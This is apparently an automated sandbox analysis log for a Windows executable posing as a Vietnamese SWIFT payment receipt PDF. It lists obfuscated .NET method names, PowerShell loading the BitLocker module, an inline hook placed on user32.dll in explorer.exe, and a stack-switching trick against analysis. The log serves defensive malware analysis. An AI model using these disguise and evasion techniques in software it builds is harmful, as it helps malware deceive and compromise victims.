Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, S99sKCwkUgfjFW1F2E.cs	High entropy of concatenated method names: 'G1H4mcTUF', 'UqFplSk41', 'jCE6meMxc', 'p7hvkNvYZ', 'TBD5nBKf3', 'Jvr0ZnOhh', 'klaPATth1HglNFA8R1', 'aWZSDCycKmhj4U6mEe', 'NKrAhiWQd', 'VA5VcIfDQ'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, m17wl5gyXIYxEphQSi.cs	High entropy of concatenated method names: 'gWTPISNSk4', 'VpoPbxEfRF', 'yymPLpq1W4', 'uSHLUIob6I', 'TVGLzyfpcQ', 'OvdPijsr3C', 'F10PduiwUn', 'YV3PwhE3iO', 'cI9P2aLFDP', 'XSaPcWLeaM'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, N51F8eS7M336gjuOQe.cs	High entropy of concatenated method names: 'ToString', 'JNtf1RXoC7', 'JFYfuRfuN2', 'ywQfZF8FIc', 'QLvfnXxIAV', 'cWEfYCuWAt', 'uE6fR4ISs6', 'ferfgHfhfG', 'Phff3i98RG', 'WU1fWpCxae'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, RGkZwXd2QKZGKicuqrN.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'T5mV8GjvLq', 'Y0UVeVa5B9', 'XnLVSfWMSQ', 'FPEV9HeRaI', 'UJNVycO8xo', 'WZpVa03LHb', 'MfJVsMtiRj'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, CQI3QdEcGdnwovGMHe.cs	High entropy of concatenated method names: 'SrnLGqhse1', 'PgJLkAgjvk', 'BbKLo4BVCU', 'PGuLPoik4j', 'U1aLmf6o0H', 't3CoyGkJNg', 'MuGoa8cxK1', 'p5xosBIJMG', 'DLdordTYRJ', 'NeDoC03wIm'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, YctVRKUxpHKimVh9oZ.cs	High entropy of concatenated method names: 'itJXdmsVfl', 'adTX2cU5a7', 'hdtXc8d89y', 'TZgXIUcr1K', 'rYgXkKI1I5', 'jv8XoYTIBm', 'y9tXLsaOFM', 'QBHAs2J0MZ', 'uTYArRcyd0', 'faaACgYwHQ'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, Opxb7eaP868xKQGrG7.cs	High entropy of concatenated method names: 'G79trVATuZ', 'eyrtU8vZqd', 'gM3Ai2axW4', 'sDpAdmX2O1', 'TPNt1yp3uV', 'jMkthkhkWA', 'RGetNGDrBD', 'NXjt8MM9n0', 'iHCteKH0dV', 'VmptSKmT1B'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, rq1BUr5VZZXD0uE869.cs	High entropy of concatenated method names: 'rvxbpOnGBp', 'G1nb6ogWqk', 'koFbj1wVAb', 'V9Eb5dvfxe', 'NgEbJbKmsF', 'nvXbfwpXBi', 'LxFbtKa1L0', 'pxTbAc1gHZ', 'Pv3bXvCEMS', 'JeAbVb30FY'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, txwAHy8Uubv9bs8qMA.cs	High entropy of concatenated method names: 'TCIJ7EesbB', 'kEeJhiSiPk', 'hADJ8F1Jf5', 'SMRJeDniAI', 'XXnJunkO9V', 'zmHJZeqcBS', 'LEfJn3qPjN', 'XvVJYMekbi', 'iodJRj3Tau', 'XfQJg0y8vv'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, Ojee41CAUtxnDk0HO8.cs	High entropy of concatenated method names: 'MlRAEK1uLA', 'LOcAuQ7mde', 'NYmAZcDewj', 'vJLAnLigkx', 'UKDA80PHJk', 'BrwAYVbElr', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, OIoygQdidwRtww3HMue.cs	High entropy of concatenated method names: 'zFoXxA6LtK', 'uDPXHXCyEo', 'cqYX4A1CeS', 'QbyXppbyju', 'YiOXqbhjqK', 'gknX6b331s', 'BkKXvE5uiC', 'YSnXjWf0wE', 'aMxX5HNyGu', 'FJ6X0rxIqj'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, R5ylPsziDFFfkUvxkJ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jp6XQf6hHg', 'CG9XJ7JrjL', 'AC4Xfuhk1a', 'ekoXthpCc5', 'D0WXA8OrJa', 'Jx1XXZuRlU', 'D3OXVckoVM'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, xYPAYSraJMMNXUsLYd.cs	High entropy of concatenated method names: 'fxYAIrEefT', 'N4yAkUxAje', 'ERrAbHoPsO', 'UAcAoGw4ss', 'LCbALLocGW', 'OsPAPdXjyq', 'MnBAmX5mOu', 'rIhAFZc4St', 'K9gATmEdJd', 'dnBAMGR6GJ'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, mGYi92W6vWKXwwGZUR.cs	High entropy of concatenated method names: 'UgoPx5agkw', 'XcLPHOPD4I', 'y5AP4MeR1U', 'WdrPpVvpUf', 'zU8PqyG0LT', 'P3GP6VgJor', 'A6BPvFiQG9', 'S8LPjP1Iyi', 'MFdP51PGy9', 'G8yP0jOBVU'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, GXx0SGmTOiRtn7taWO.cs	High entropy of concatenated method names: 'FaF2GPawdM', 'Urq2IyImfT', 'o412kNe4nF', 'Fcg2bQALh1', 'm982oQ9Ujm', 'DAN2LiKnjT', 'DlR2PVmecT', 'H0d2mBaJM7', 'uua2FEAs4X', 'CfJ2TpOv1F'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, AInQANcBZDOFBXnowL.cs	High entropy of concatenated method names: 'kvVdPtLDUu', 'ifidmeHjDb', 'WVZdTZXD0u', 'G86dM979FA', 'CTVdJrXvQI', 'LQddfcGdnw', 'A99hkL0VWNn21TcMji', 'jno0dHMjpvHNr3MNRB', 'l9XddVRc9E', 'QXZd2Dv5I5'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, o7K34QkyJitaHU4ZWf.cs	High entropy of concatenated method names: 'Dispose', 'sZhdCvBK5i', 'J9Nwu1qJtZ', 'iw5772Uwhs', 'KxYdUPAYSa', 'oMMdzNXUsL', 'ProcessDialogKey', 'Jd7wijee41', 'rUtwdxnDk0', 'yO8wwUctVR'

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	File created: \bien nhan thanh toan swift message 38579130 vnd8509509220_pdf.exe
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	File created: \bien nhan thanh toan swift message 38579130 vnd8509509220_pdf.exe
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	File created: \bien nhan thanh toan swift message 38579130 vnd8509509220_pdf.exe	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	File created: \bien nhan thanh toan swift message 38579130 vnd8509509220_pdf.exe	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE8

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	API/Special instruction interceptor: Address: 7FFDB442D324
